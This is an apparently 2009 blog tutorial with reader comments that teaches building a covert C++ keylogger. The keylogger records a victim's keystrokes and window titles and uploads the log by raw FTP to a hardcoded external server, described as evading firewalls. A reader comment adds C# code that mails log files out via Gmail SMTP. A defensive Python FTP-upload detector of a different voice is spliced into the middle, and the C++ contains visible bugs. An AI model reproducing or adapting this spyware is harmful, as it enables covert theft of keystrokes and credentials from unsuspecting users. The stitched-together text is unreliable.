Friday, May 29, 2009

C++ - FTP Uploading through winsock (bypasses firewalls!)

First, thanks to all of you who have subscribed, and to any of you who haven't:
SUBSCRIBE, the link is to your right!


Anyway, I know it's been a long time since my last post, but with good cause! I have finally put together a way for you to upload your logs to an FTP server without fail and which bypasses any firewall restrictions that the victim's computer may have!

Also, this post can stand alone from the other keylogger tutorials, but if you want to use this code in those loggers, I suggest you read them too.

So let's get started with this tutorial. First, what is FTP?
Well, FTP is short for File Transfer Protocol and is a tcp or udp layer protocol which is used for transferring data. If you want more information about the history of the protocol, or even otherwise, I strongly suggest you read en.wikipedia.org/wiki/FTP

Anyway moving on, so how does FTP work? Well, FTP names a specific connection between a client and a server, and the specific commands and data signatures that are sent between them.
In order to make this program I had to read through the FTP RFC, a documentation by researchers and founders of the protocol. Google "RFC 959" for more information. Anyway, the basics are that the client has to communicate with the server in a very distinct way. I've laid it out below in normal language and then in FTP command language.

CHATROOM FTPSUCKSJUSTKIDDING OPENED
Client connects to server
Client: Here is my username.
Server: Oh, nice username, okay the username has been set, enter your password.
Client: K, here's my password.
Server: Good Job, thats the right password, you are now connected OR you phail, thats the wrong password.
Assuming the password is correct.....
Client: Okay so now im going to send a image file to you, like .exe or .txt okay?
Server: Okay, connect to me on <000,00,000,000,10,4>
Client: Okay ill connect to you on ip 000.00.000.000 on port 2564 because 10*256+4 is 2564
Client: Okay now imma send some data and i need you to store it as data.txt in the /data folder
Server2: -_-
Client opens second connection to Server2
Client sends data
Client: Okay we are done, imma go now bye!
Client leaves the chatroom

Enough of that childish bs ;] , now for some real commands, notice how they are so much shorter and notice that the server never checks the integrity of the file.

Client Connects to server
Client: "USER username\r\n"
Server: 331 Username set to "username"
Client: "PASS password\r\n"
Server: 203 Password Correct you are now connected
Client: "TYPE I\r\n"
Server: 200 File set to binary aka image
Client: "PASV\r\n"
Server: 227 Passive Mode entered <100,10,100,100,10,4>
Client: "STOR data.txt\r\n"
Client Opens new connection to server 2
Client Sends Data
Client Leaves


Note the different messages that the server sends back, we will use them in error checking.

So all we have to do for our upload feature is send data in this format to the server and have it save it, and the firewall will never know because it's an outward connection! Well, not just that, we will get into more reasons why this works on firewalls later.
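
Seen from the defending side, this whole control-channel dialogue crosses the network in cleartext, so a sensor that logs it can attribute every upload. The Python below is an added example, not code from the original post: it parses constructed control-channel log lines (the log format, addresses, account names and the INTERNAL_NETS list are assumptions), computes the passive data port from the 227 reply in its RFC 959 form, and reports each STOR with a flag for servers outside the internal networks.

```python
import re
from ipaddress import ip_address, ip_network

# Assumption: the address ranges this organisation treats as internal.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]

# Constructed sample: FTP control-channel lines as a network sensor might log
# them: timestamp, client, server, direction (C = client, S = server), payload.
# Addresses, account names and file names are made up for this example.
SAMPLE_LOG = """\
2009-05-29T10:00:01 10.20.0.15 203.0.113.9 S 220 FTP server ready
2009-05-29T10:00:02 10.20.0.15 203.0.113.9 C USER exampleuser
2009-05-29T10:00:02 10.20.0.15 203.0.113.9 S 331 Password required
2009-05-29T10:00:03 10.20.0.15 203.0.113.9 C PASS examplepass
2009-05-29T10:00:03 10.20.0.15 203.0.113.9 S 230 User logged in
2009-05-29T10:00:04 10.20.0.15 203.0.113.9 C TYPE I
2009-05-29T10:00:04 10.20.0.15 203.0.113.9 S 200 Type set to I
2009-05-29T10:00:05 10.20.0.15 203.0.113.9 C PASV
2009-05-29T10:00:05 10.20.0.15 203.0.113.9 S 227 Entering Passive Mode (203,0,113,9,10,4)
2009-05-29T10:00:06 10.20.0.15 203.0.113.9 C STOR data.txt
2009-05-29T10:00:06 10.20.0.15 203.0.113.9 S 150 Opening BINARY mode data connection
2009-05-29T10:00:07 10.20.0.15 203.0.113.9 S 226 Transfer complete
2009-05-29T11:30:00 10.20.0.77 10.1.1.5 C USER backup
2009-05-29T11:30:01 10.20.0.77 10.1.1.5 C PASV
2009-05-29T11:30:01 10.20.0.77 10.1.1.5 S 227 Entering Passive Mode (10,1,1,5,195,80)
2009-05-29T11:30:02 10.20.0.77 10.1.1.5 C STOR nightly.tar
"""

# 227 reply: six comma-separated numbers h1,h2,h3,h4,p1,p2. The free text and
# the bracket style around them vary between servers, so only the numbers count.
PASV_RE = re.compile(
    r"227\b\D*(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def parse_pasv_reply(payload):
    """Return (ip, port) from a 227 reply, or None if it is not a valid one."""
    m = PASV_RE.match(payload)
    if not m:
        return None
    nums = [int(n) for n in m.groups()]
    if any(n > 255 for n in nums):          # each field is a single byte
        return None
    h1, h2, h3, h4, p1, p2 = nums
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def is_external(addr, internal_nets=INTERNAL_NETS):
    """True when addr is outside every configured internal network."""
    ip = ip_address(addr)
    return not any(ip in net for net in internal_nets)


def find_ftp_uploads(log_text, internal_nets=INTERNAL_NETS):
    """Rebuild each control session and return one finding per STOR command."""
    sessions = {}                            # (client, server) -> state so far
    findings = []
    for line in log_text.splitlines():
        parts = line.split(" ", 4)
        if len(parts) != 5:
            continue                         # not a control-channel record
        ts, client, server, direction, payload = parts
        state = sessions.setdefault(
            (client, server),
            {"user": None, "cleartext_pass": False, "data": None})
        verb, _, arg = payload.partition(" ")
        if direction == "C":
            verb = verb.upper()
            if verb == "USER":
                state["user"] = arg
            elif verb == "PASS":
                state["cleartext_pass"] = True   # record the fact, not the secret
            elif verb == "STOR":
                data = state["data"]
                findings.append({
                    "time": ts,
                    "client": client,
                    "server": server,
                    "user": state["user"],
                    "file": arg,
                    "cleartext_pass": state["cleartext_pass"],
                    "data_endpoint": data,   # look this up in flow records
                    "pasv_ip_mismatch": data is not None and data[0] != server,
                    "external": is_external(server, internal_nets),
                })
        elif direction == "S" and verb == "227":
            state["data"] = parse_pasv_reply(payload)
    return findings


if __name__ == "__main__":
    for f in find_ftp_uploads(SAMPLE_LOG):
        tag = "EXTERNAL" if f["external"] else "internal"
        print(f["time"], tag, f["client"], "->", f["server"],
              "user=%s file=%s data=%s" % (f["user"], f["file"], f["data_endpoint"]))
```

The (ip, port) pair in each finding is the endpoint to look up in flow records to size the transfer that followed on the data connection.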

Anyway, I bet many of you guys are like whoa there slow down. How do I get an ftp server, well the easiest way for you noobs (Just Kidding) would be to get one from the free webhosting site tripod.com. The name of your ftp server will be ftp.tripod.com. Your username will be your username, and your password will be your password that you set!

You will also need someway to access your ftp server. I suggest that you download FireFTP or FileZilla to manage your server and so that you can see if the following code works!

Simple right?

So anyway, after that's done, let's create a small test file in our C:\ folder that we can upload, and just for compatibility let's name it test.txt. Open the text file and paste in whatever you want, but make sure the file has something in it.

Okay, now we are ready to start coding, almost! For this program we will be using sockets to send our file because that's the only way to send it without alerting the firewall. If you guys are not worried about firewalls, I would suggest you just use the wininet library for FTP, which makes life much easier but more painful when you realize your files aren't getting sent.

A good source for help with the wininet functions is here and for specific functions use the same page just navigate to the wininet functions tab or just click on the links. Comment if you need any help and I can send you the wininet code!

Well, we want to do it the boss way, so we will learn winsock, or actually winsock2.
Winsock is a set of Windows APIs for socket programming. A socket is a connection. I really suggest that you know some winsock before coming in: either buy a book, or read a tutorial like this one: http://www.madwizard.org/programming/tutorials/netcpp/.

In addition, before we start coding, we have to link against winsock. For those of you using Dev-C++, it's project, compile options, linkers, and then in that box add -lws2_32, which links you against winsock!

Okay, now let's first make some base functions that we will need. I'm going to keep this long and tedious because I know a lot of you cannot object orient your programs, which means that I won't either. If you want an object oriented approach to this simple program, just email me.

In addition, add these to your header if they aren't there already:

#include <string>
#include <winsock.h>
#include <windows.h>
#include <sstream>
#include <iostream>
#include <stdio.h>
#include <cstdlib>




Anyway, moving on, remember that the server sends us back the IP to connect to? Well, it sends it in string format, or at least it is in string format after we separate it. Yes, I know we are getting a little ahead of ourselves, but we have to create a function that can change the separated strings into integers. For that we use iostreams.

Here is the function. I won't go into explaining it because you can look it up on the web and we have a lot to cover. Furthermore, it's pretty self-explanatory.


void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}


One thing that you should note, though, is the way we were able to modify the parameters within the function. This is due to something very useful called pointers, and you should learn about them if you don't know already.

Moving on, now comes the main part. If you read that winsock tutorial you should be able to follow along. I am going to give you the code for main and then explain it after. Don't worry if you have any questions, and remember, if I leave anything unexplained, don't be afraid to comment and ask about it.

Also note that I haven't done any error checking, so you better hope it works ;]. It should, but it's always good to do some error checking, and I want you, the reader, to have a shot at it. Be sure to send me your implementation and I will publish it alongside mine in the next post, or maybe the one after that.



#include <string>
#include <winsock.h>
#include <windows.h>
#include <sstream>
#include <iostream>
#include <stdio.h>
#include <cstdlib>

using namespace std;

void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}

void sendLogIn(SOCKET _LSoc){
char userbuffer[] = "Your Username Here"; //PUT YOUR USERNAME AND PASSWORD IN THE USERBUFFER
char passbuffer[] = "Your Password Here"; //AND PASSBUFFER VARIABLES NOT ANYWHERE ELSE
char username[] = "USER ";
char password[] = "PASS ";
char servermessage[1000];

strcat(username, userbuffer);
strcat(username, "\r\n");

send(_LSoc, username, strlen(username), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);

strcat(password, passbuffer);
strcat(password, "\r\n");

send(_LSoc, password, strlen(password), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);
}

int sendConnInfo(SOCKET _CSoc){
char servermessage[10000];
char ftpmessage[50];
string message;
string portbuffer;
string port1;
string port2;
size_t position;
size_t position2;
int port;
int portbuf;
int _portbuf;

send(_CSoc, "TYPE I\r\n", 8, 0);
Sleep(1000);
recv(_CSoc, servermessage, 10000, 0);
Sleep(1000);
Sleep(1000);
send(_CSoc, "PASV\r\n", 6, 0);
Sleep(1000);
recv(_CSoc, ftpmessage, 50, 0);

message = ftpmessage;
position = message.find("Mode");
portbuffer = message.substr(position+21);

position = portbuffer.find(",");
position2 = portbuffer.find(">");

port1 = portbuffer.substr(0, position);
port2 = portbuffer.substr(position+1, position2-1);

stringtoint(port1, portbuf);
stringtoint(port2, _portbuf);

port = portbuf*256;
port = port + _portbuf;
return port;
}

void sendFileRequest(SOCKET _FSoc){
send(_FSoc, "STOR test.txt\r\n", strlen("STOR test.txt\r\n"), 0);
Sleep(1000);
}

BOOL ftpSocket(int port){
SOCKET sock;
SOCKADDR_IN pasvserver;
char servermessage[MAX_PATH];
HANDLE HFile;
DWORD read;
char *buffer;
char filename[] = "C:\\test.txt";
int connectionerror2;
int trycount2 = 2;


sock = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(sock == INVALID_SOCKET){
WSACleanup();
return 0;
}

pasvserver.sin_family = 2;
pasvserver.sin_port = htons(port); //htons converts the port into a readable form for the SOCKADDR_IN structure
pasvserver.sin_addr.s_addr = inet_addr("209.202.252.54"); //Once again the tripod ftp server

connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
while(connectionerror2 == SOCKET_ERROR){
connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
trycount2++;
if(trycount2 = 10){
closesocket(sock);
WSACleanup();
return 0;
}
}


HFile = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

buffer = (char *)malloc(4096);
SetFilePointer(HFile, 0, NULL, FILE_BEGIN);

while(ReadFile(HFile, buffer, 4096, &read, NULL) && read > 0){
send(sock, buffer, read, 0);
}

return true;
}



int sendFile(){
FreeConsole();
WSAData WData;
SOCKET FSoc;
SOCKADDR_IN server;
int connectionerror;
int trycount = 2;
char servermessage[MAX_PATH];
int port;

WSAStartup(MAKEWORD(2,2), &WData);
FSoc = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(FSoc == INVALID_SOCKET){
WSACleanup();
return 0;
}

server.sin_family = 2;
server.sin_port = htons(21);
server.sin_addr.s_addr = inet_addr("209.202.252.54"); //this is the tripod ftp server address. You can change it if you arent
//using the tripod ftp server.

connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
while(connectionerror == SOCKET_ERROR){
connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
trycount++;
if(trycount = 10){
closesocket(FSoc);
WSACleanup();
return 0;
}
}

recv(FSoc, servermessage, sizeof(servermessage),0);

sendLogIn(FSoc);
Sleep(1000); //give the server and the client sometime to deal with the influx of new messages
//so that data for the ip doesnt get mixed up.
port = sendConnInfo(FSoc);
sendFileRequest(FSoc);
ftpSocket(port);
WSACleanup();
return 0;
}



OMG OMG OMG OMG OMG OMG WHAT IS THAT!

Yes, I know what's going through your mind, but it's really not that complicated. Before I start explaining, make sure you read the server client conversation above once more. So let's start with the main. Basically, we initialize a new Winsock session. We then create a socket in that session. Then we use the SOCKADDR_IN structure to assign some very important connection information, and then we connect to the server!

What's the while loop next, you may ask? Well, it's just to make sure that our program doesn't spend forever attempting to connect to the server and that it gives up after a while =).

Okay, so then we have some function calls. Also note that all the Sleeps are just to make sure that the server has finished sending all the data for that call; otherwise (you would see this if you error checked) the responses from the server get really, really mixed up.

Moving on, now that we are connected we have our first function call, sendLogIn, which sends the password and the username to the connection specified by the socket handle FSoc. Note that in sendLogIn and all the other functions, all the data is sent in that specific way. You have to change the values of the first two variables in sendLogIn to specify your username and password! Please don't comment about that.

Okay, next we have sendConnInfo which uses the string conversion to return a port for our next, next method to use.

Okay, next we have sendFileRequest which issues a store request to the socket specified by FSoc to store whatever data is coming in in the file test.txt in the default folder.

So ftpSocket() is basically the same as main, except that it connects to the server on a different port, which sendConnInfo parsed and returned. However, at the end of it, it sends the data to the server, which knows that it has to store it, AND IT DOES.

Now whip up fireftp and see if it worked!

In the end we issue a cleanup WSACleanup(); and then we end our program!

Well, that was awesome right! How about we put it into our keylogger.

Remember, if you have any problems, compliments, questions, comments etc. BE SURE TO COMMENT AND SUBSCRIBE!
Especially if it doesn't compile or work, because it should.

Tune in next time for instructions on how to make this keylogger run every time the user starts up their machine!

WARNING:
MESSY CODE BELOW ;]
-----------------------------------------------------------------------------------

#include <string>
#include <winsock.h>
#include <windows.h>
#include <sstream>
#include <iostream>
#include <stdio.h>
#include <cstdlib>

using namespace std;


void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}

void sendLogIn(SOCKET _LSoc){
char userbuffer[] = "Your Username Here"; //PUT YOUR USERNAME AND PASSWORD IN THE USERBUFFER
char passbuffer[] = "Your Password Here"; //AND PASSBUFFER VARIABLES NOT ANYWHERE ELSE
char username[] = "USER ";
char password[] = "PASS ";
char servermessage[1000];

strcat(username, userbuffer);
strcat(username, "\r\n");

send(_LSoc, username, strlen(username), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);

strcat(password, passbuffer);
strcat(password, "\r\n");

send(_LSoc, password, strlen(password), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);
}

int sendConnInfo(SOCKET _CSoc){
char servermessage[10000];
char ftpmessage[50];
string message;
string portbuffer;
string port1;
string port2;
size_t position;
size_t position2;
int port;
int portbuf;
int _portbuf;

send(_CSoc, "TYPE I\r\n", 8, 0);
Sleep(1000);
recv(_CSoc, servermessage, 10000, 0);
Sleep(1000);
Sleep(1000);
send(_CSoc, "PASV\r\n", 6, 0);
Sleep(1000);
recv(_CSoc, ftpmessage, 50, 0);

message = ftpmessage;
position = message.find("Mode");
portbuffer = message.substr(position+21);

position = portbuffer.find(",");
position2 = portbuffer.find(">");

port1 = portbuffer.substr(0, position);
port2 = portbuffer.substr(position+1, position2-1);

stringtoint(port1, portbuf);
stringtoint(port2, _portbuf);

port = portbuf*256;
port = port + _portbuf;
return port;
}

void sendFileRequest(SOCKET _FSoc){
send(_FSoc, "STOR storekey.txt\r\n", strlen("STOR storekey.txt\r\n"), 0);
Sleep(1000);
}

BOOL ftpSocket(int port){
SOCKET sock;
SOCKADDR_IN pasvserver;
char servermessage[MAX_PATH];
HANDLE HFile;
DWORD read;
char *buffer;
char filename[] = "C:\\storekey.txt";
int connectionerror2;
int trycount2 = 2;


sock = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(sock == INVALID_SOCKET){
WSACleanup();
return 0;
}

pasvserver.sin_family = 2;
pasvserver.sin_port = htons(port); //htons converts the port into a readable form for the SOCKADDR_IN structure
pasvserver.sin_addr.s_addr = inet_addr("209.202.252.54"); //Once again the tripod ftp server

connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
while(connectionerror2 == SOCKET_ERROR){
connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
trycount2++;
if(trycount2 = 10){
closesocket(sock);
WSACleanup();
return 0;
}
}


HFile = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

buffer = (char *)malloc(4096);
SetFilePointer(HFile, 0, NULL, FILE_BEGIN);

while(ReadFile(HFile, buffer, 4096, &read, NULL) && read > 0){
send(sock, buffer, read, 0);
}

return true;
}



int sendFile(){
FreeConsole();
WSAData WData;
SOCKET FSoc;
SOCKADDR_IN server;
int connectionerror;
int trycount = 2;
char servermessage[MAX_PATH];
int port;

WSAStartup(MAKEWORD(2,2), &WData);
FSoc = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(FSoc == INVALID_SOCKET){
WSACleanup();
return 0;
}

server.sin_family = 2;
server.sin_port = htons(21);
server.sin_addr.s_addr = inet_addr("209.202.252.54"); //this is the tripod ftp server address. You can change it if you arent
//using the tripod ftp server.

connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
while(connectionerror == SOCKET_ERROR){
connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
trycount++;
if(trycount = 10){
closesocket(FSoc);
WSACleanup();
return 0;
}
}

recv(FSoc, servermessage, sizeof(servermessage),0);

sendLogIn(FSoc);
Sleep(1000); //give the server and the client sometime to deal with the influx of new messages
//so that data for the ip doesnt get mixed up.
port = sendConnInfo(FSoc);
sendFileRequest(FSoc);
ftpSocket(port);
WSACleanup();
return 0;
}


string convertkey(int key){
string keystring;
switch(key)
{
case 8 :
keystring = "[/]";
break;
case 13 :
keystring = "\n";
break;
case 32 :
keystring = " ";
break;
case 190 :
keystring = ".";
break;
case 110 :
keystring = ".";
break;
case VK_CAPITAL :
keystring = "[CAPS LOCK]";
break;
case VK_TAB :
keystring = "[TAB]";
break;
case VK_CONTROL :
keystring = "[CONTROL]";
break;
case VK_ESCAPE :
keystring = "[ESCAPE]";
break;
case VK_DOWN :
keystring = "[DOWN]";
break;
case VK_LEFT :
keystring = "[LEFT]";
break;
case VK_RIGHT :
keystring = "[RIGHT]";
break;
case VK_UP :
keystring = "[UP]";
break;
}
if(key >= 96 && key <= 105)
keystring = key-48;
else if (key > 47 && key < 60)
keystring = key;
if (key != VK_LBUTTON || key != VK_RBUTTON)
{
if (key > 64 && key < 91)
{
if (GetKeyState(VK_CAPITAL) | GetAsyncKeyState(VK_SHIFT))
keystring = key; //if its capital then stay
else
{
key = key + 32; //if not shift the number to the lowercase value
keystring = key;
}
}
}
return keystring;
}

void StoreKey(string key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}

void Logger()
{
string keyinstring = "";
int key;
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
keyinstring = convertkey(key);
StoreKey(keyinstring);
}
}
}
}

int main(){
sendFile();
Logger();
return 1;
}

---------------------------------------------------------------------------------


50 comments:

  1. Interesting, very interesting~

    One thing, though. What do you mean error checking? debug? I'm actually pretty bad at debbuging, so... xD

  2. Another thing: woudnt it be better to put the ftp main code in a header or other such file?

  3. yeah it probably would, i mean i would just make it a separate class and call it from this or something like that.

    you know what i just might make an ftp library based on winsock functions.

    subscribe and look for it

    no by error checking i meant looking if the socket failed etc.. or password is wrong and ending the program or fixing the error
    or logging it

  4. Ah, I see...
    yea, if you put it that way, error checking is quite vital xD

  5. I have 2 questions:
    1) There are some things that dont look like codeing and they are all after a //, am i supposed to put them in my keylogger?
    2)On the really long lines, there are things that are cut of, could you send me a txt file so i can see whats cut off?

  6. nothings cut off it just wraps around

    and for question 1. Those are called comments. I would really suggest you learn some c++ before attempting this

    Anyway, you can keep them or get rid of them its your choice just make sure that if you keep them they dont wrap around to multiple lines

    and if you want a text file just click the view source button on the top of the code.

  7. First off thank you. I'm kinda new to coding, but in C# it can be done just using this:
    using System.Net;
    using System.Net.Mail;

    public static void OnTimedEvent(object source, EventArgs e)
    {
    System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
    msg.To.Add("username@gmail.com");
    msg.To.Add("another.optional.address.to.send.to@domain.com");
    msg.From = new MailAddress("username@gmail.com", "nickname", System.Text.Encoding.UTF8);
    msg.Subject = "whatever.you.want.to.be.in.the.message.subject";
    msg.SubjectEncoding = System.Text.Encoding.UTF8;
    msg.Body = "whatever.you.want.to.be.in.the.message.body";
    msg.BodyEncoding = System.Text.Encoding.UTF8;
    msg.IsBodyHtml = false;
    msg.Priority = MailPriority.High;
    SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
    client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "gmailpassword");
    client.Port = 587;
    client.Host = "smtp.gmail.com";
    client.EnableSsl = true;
    Attachment data = new Attachment(where the log file is located);
    msg.Attachments.Add(data);
    try
    {
    client.Send(msg);
    failed = 0;
    }
    catch
    {
    data.Dispose();
    failed = 1;
    }
    data.Dispose();

    if (failed == 0)
    File.WriteAllText(appstart.path, ""); //empties the file

    failed = 0;
    }
    It may look complicated, but it simpler than it looks. Is there a way to replicate this in C++?
    Btw would a firewall block this?

  8. 1. Would a firewall block this.
    It depends, im pretty sure it depends on what type of firewall is on the computer, and even if a user based fw doesnt block it, you might have trouble with router firewalls and isp rules.

    2. Is there a way to replicate this in C++.
    Yes, there is, I am looking into it right now. Its probably a little harder than the winsock ftp but the same basic concept. Open a connection and send data in the format specified by smtp. As a reference point, I would suggest you read the rfc 2821 at http://tools.ietf.org/html/rfc2821 and also look at the bloodred library source which could probably teach you about the format. Know that for gmail you will probably need to use tls "wikipedia it?" and base64 encode all the data you send (theres plenty of source online for this.

    However, if you want to take the easy approach, there are several smtp libraries that could make it so much easier, you might have some problems with fw's though.
    I would recommend checking out chillkat and other similar libraries.

    Oh and for the c# code, im pretty sure the victim would have to have .net installed right?

    Replies
    1. I'm so sad I found this site 4 years after its last publication... I would have followed it instantly! if you are still alive and read this, could we communicate somehow? This is my email: vecman_2@hotmail.com

  9. Wow, thanks badfish303. Ya they do have to have .net installed, but XP service pack 1 and on all have it, so I'm set if there using a windows computer. I tested the code on my computer and windows 7 firewall does not block, but that's not saying much. Sorry for asking so many questions, but I get how a firewall would block mine, but what makes the code here not blockable by a firewall? (Also you probably already figured out how to run it at start up, but I have an idea if you want to hear it).

  10. By .NET, I thought that this api required .NET 2.0 on the victim's computer?

    And, your right, windows 7 firewall is not exactly the best, but whatever works for you. I personally have never tested it, but I think the calls to well known .NET api might trigger a firewall or even antivirus.

    Secondly, I havent tested the above code with all firewalls, but I think the best way to explain the reason it works is that it is the same reason that entering "ping google.com" in cmd doesnt trigger the firewall. The code only starts an outbound connection to the server. In contrast, if we had not used passive FTP and the server had connected to us, we would probably have a firewall alert.

    And btw, im looking into some C++ smtp code, I should have a simple but probably buggy client out in about a week!

  11. Cool, can't wait :). (Your right again, it is not included until .NET 2.0, so XP service pack 2 or later).

    Random Question: Is the server located in California, cause I just noticed the time is three hours off?

    Also I recommend trying the Visual Studio 2010 Beta as I prefer it over Dev (although most of the improvement are just in the .NET framework)

  12. What server?

    And I have VS2010, I just use Dev because i dont really use .net

    Btw, did some research into smtp via gmail, i dont really understand how the c# code works, especially since gmail requires tls encryption for all data connections to their smtp server. Im gonna have to find a tls or ssl library and try to smtp over that. We'll see how it goes.

  13. (i'm moid1994 btw)
    it turns out, its just my browser that cuts off text, (Wii based Opera)
    Also, im fairly good at C++, but i dont know everything, so i read this stuff to learn, :)
    Also, what type of file do i save these keyloggers as? (i made 3, each one with the specifics of one of your keylog posts)
    btw, keep on posting these, they're really cool)

  14. Thanks for making this.

    I have a couple comments/ questions.

    1) First.. I have to create the .txt file first, otherwise it does not make the log file. After i create the file manually, it records the keys into the file i created.

    2) My FTP server says that it is updated every time initiate the program. The only problem is that this is always blank. I tried running the program after the log had data in it, but it did not solve the problem.

    If you could respond, thanks.

  15. Also i got these errors:

    xecuting g++.exe...
    g++.exe "C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp" -o "C:\Dev-Cpp\Richard's Programs\newkeylogger.exe" -I"C:\Dev-Cpp\lib\gcc\mingw32\3.4.2\include" -I"C:\Dev-Cpp\include\c++\3.4.2\backward" -I"C:\Dev-Cpp\include\c++\3.4.2\mingw32" -I"C:\Dev-Cpp\include\c++\3.4.2" -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib" -lws2_32
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp: In function `void StoreKey(std::string)':
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp:243: error: variable `std::ofstream storekey' has initializer but incomplete type

    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp: In function `void Logger()':
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp:265: error: variable `std::ofstream storekey' has initializer but incomplete type

    Execution terminated


    What i did to fix it:

    include fstream
    and put the () after the storekey.close

    (I'm only a noob, so I thought this is what I needed to do to fix this, but I could be wrong which might explain my problems experienced above). Plz help, thanks.

  16. a third thing: In windows vista you cannot naturally create a text file in C:\, instead you have to create it elsewhere and move it to C:\, which then requires administrator verification.

  17. Yeah, I didn't make this for vista, but there are plenty of ways to bypass uac on vista, ill look into it.

  18. Hey badfish303. You are an absolute genius. Hats off to your creative prowess. I have taken up C++ programming inspired by the posts from your side. Keep up the good work.
    I have compiled the programme as in your post. Only facing a single problem as of now - the file - storekey.txt is not getting uploaded on my ftp server. I have placed the username and password as mentioned in your code - to be exact twice ( once for username and once for password in lines 17 & 18 respectively ). Please guide me. Thanks again.

  19. Thanks for making this.

    I have a couple comments/ questions.

    1) First.. I have to create the .txt file first, otherwise it does not make the log file. After i create the file manually, it records the keys into the file i created.

    2) My FTP server says that it is updated every time initiate the program. The only problem is that this is always blank. I tried running the program after the log had data in it, but it did not solve the problem.

    If you could respond, thanks.

    Also i got these errors:

    xecuting g++.exe...
    g++.exe "C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp" -o "C:\Dev-Cpp\Richard's Programs\newkeylogger.exe" -I"C:\Dev-Cpp\lib\gcc\mingw32\3.4.2\include" -I"C:\Dev-Cpp\include\c++\3.4.2\backward" -I"C:\Dev-Cpp\include\c++\3.4.2\mingw32" -I"C:\Dev-Cpp\include\c++\3.4.2" -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib" -lws2_32
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp: In function `void StoreKey(std::string)':
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp:243: error: variable `std::ofstream storekey' has initializer but incomplete type

    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp: In function `void Logger()':
    C:\Dev-Cpp\Richard's Programs\newkeylogger.cpp:265: error: variable `std::ofstream storekey' has initializer but incomplete type

    Execution terminated


    What i did to fix it:

    include fstream
    and put the () after the storekey.close

    (I'm only a noob, so I thought this is what I needed to do to fix this, but I could be wrong which might explain my problems experienced above). Plz help, thanks.

  20. Ok, can i make this without a compiler?

  21. aite you obviously dont know anything about programming liar....

  22. WELL then, since your so 1-11-11-111, or, D37, or, 13-3-7
    please dont talk to me like i dont know anything, im STARTING C++, but i SPECIALIZE in machine-level languages, not 1100++/12++; MS-DOS are new to me, as i said before, i know some, i read these types of [ie blogs, websites, ect.] to LEARN, DO NOT INSULT ME so 15 you

  23. P.S. there are ways around everything.......

  24. there arent ways around taking source code and turning into a executable without compiling...

    and anyway, what are all the numbers in your post...

    i understand you came to learn but read the post, you need a base level of knowledge, or atleast a compiler...

  25. and i dont get how you would be "fairly good at C++" without having a compiler.

  26. I just open notepad and type in the MS-DOS commands for example:
    shutdown.exe -s -t 30 -c "[put message here]"
    when saved as a batch file (*.bat), will make the computer shutdown in 30 seconds
    color 2a means CMD will have a black background and green text
    @echo off turns off the display of commands
    echo displays text/result of command on that line
    ping localhost -2 < null pauses commands for 2 seconds
    pause closes after "press any key to continue"
    pause < null pauses until keypress
    there is a lot more as well
    (without spaces between < and null)

    Back to the subject: after I put this code in notepad, I tried saving it as *.bat, *.exe, *.vbs, etc. (none of them worked), so I was wondering what a compiler adds to/saves the code
    There are many of the tech community at http://www.instructables.com/

  27. 1. The numbers are a mix between binary and hexadecimal values used to express words
    2. You can make some codes an *.exe by typing the code in notepad and saving as *.exe after changing file type from text document to all files
    3. There are many things I know about C++; there are a few examples on my blog http://www.dotcodeing.blogspot.com/

  28. 1. A compiler turns the code into machine code, which your processor can then read, so you can't just save as .exe....

